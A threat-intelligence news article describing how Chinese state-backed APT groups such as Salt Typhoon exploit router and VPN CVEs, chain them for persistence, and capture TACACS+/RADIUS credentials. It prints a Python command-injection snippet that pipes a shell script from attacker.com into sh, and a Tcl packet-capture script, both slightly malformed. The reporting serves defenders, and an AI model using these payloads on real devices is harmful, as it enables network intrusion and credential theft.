Over the past several years, a concerted campaign by Chinese state-sponsored Advanced Persistent Threat (APT) groups has exploited critical vulnerabilities in enterprise-grade routers to establish long-term footholds within global telecommunications and government networks.
These actors, often identified under monikers such as Salt Typhoon and OPERATOR PANDA, have systematically targeted provider edge (PE) and customer edge (CE) devices from leading vendors, leveraging publicly disclosed Common Vulnerabilities and Exposures (CVEs) to gain initial unauthorized access.
Their operations have demonstrated a high degree of stealth, chaining multiple exploits to move laterally and evade conventional detection tools.
The typical multi-stage attack flow begins with a web-component injection and culminating in embedded packet capture.
In initial intrusion attempts, threat actors commonly exploit CVE-2024-21887 in Ivanti Connect Secure and CVE-2024-3400 within Palo Alto Networks PAN-OS GlobalProtect.
These flaws allow remote code execution through crafted HTTP requests, granting attackers a foothold in the router’s privileged management interface.
While researchers noted that once access is achieved, the actors pivot swiftly, exploiting older vulnerabilities such as CVE-2018-0171 in Cisco IOS smart install, and CVE-2023-20198 in IOS XE web management modules, creating a dependable chain of escalation and persistence.
Cyble analysts identified rapid weaponization of publicly available proof-of-concept exploit code, often tailored in Python or Tcl scripts to suit specific router environments.
A representative snippet used in these campaigns is shown here, demonstrating command injection via the web management interface:-
import requests
url = "https[:]//192.0.2.1/+CSCOE+/translation-table?type=misc&text_scale=1"
payload = {"command"[:] "system ('curl http[:]//attacker.com/shell[.]sh | sh')"}
response = requests[.]post (url, data=payload, verify=False)
print (response[.]status_code, response[.]text)Leveraging this technique, attackers achieve remote shell execution, subsequently deploying custom tooling to harvest configuration files, credentials, and session data.
Persistence Tactics
After initial access, Chinese APT groups focus on embedding themselves deeply within the router’s operating environment to ensure longevity.
They alter Access Control Lists (ACLs) to whitelist attacker-controlled IP addresses and open non-standard ports such as 32768 and 8081 for covert access.
In many cases, malefactors exploit Cisco’s Embedded Packet Capture (EPC) functionality to siphon TACACS+ and RADIUS authentication traffic, effectively harvesting clear-text credentials. To automate this, they deploy Tcl-based scripts stored in the router’s flash memory:
package require json
set cap Cmd [list "ip" "packet" "capture" "point-to-point" "rtl" "1000"]
exec {*}$capCmd > flash:auth_capture[.]pcapThese scripts run at boot time, triggered via altered startup configurations, creating persistent PCAP files that are periodically exfiltrated over encrypted GRE tunnels.
By manipulating the AAA (Authentication, Authorization, Accounting) configuration, the actors redirect logs and disable alerting features, effectively blinding enterprise defenders.
Through these methods, the compromised devices become reliable launchpads for broader enterprise infiltration, allowing the APT actors to maintain a stealthy presence for months or even years.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
